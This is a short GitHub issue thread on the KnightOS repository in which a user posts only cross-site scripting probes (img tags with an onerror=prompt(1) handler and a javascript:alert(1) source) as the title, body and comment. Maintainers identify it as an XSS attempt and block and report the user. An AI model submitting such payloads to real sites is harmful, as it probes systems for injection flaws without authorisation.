### ISSUE TITLE
"><img src=x onerror=prompt(1);>>>>></////<<img src='javascript:alert(1);'>

### ISSUE THREAD

**Issue by Hussain-Secure** [KnightOS/KnightOS#300]
"><img src=x onerror=prompt(1);>>>>></////"><img src='javascript:alert(1);'>

**Comment by Hussain-Secure** [comment]
"><img src=x onerror=prompt(1);>>>>></////<<img src='javascript:alert(1);'>

**Comment by neersighted** [comment]
Attempt at XSS?

**Comment by SirCmpwn** [comment]
Blocked the user and reported to github.
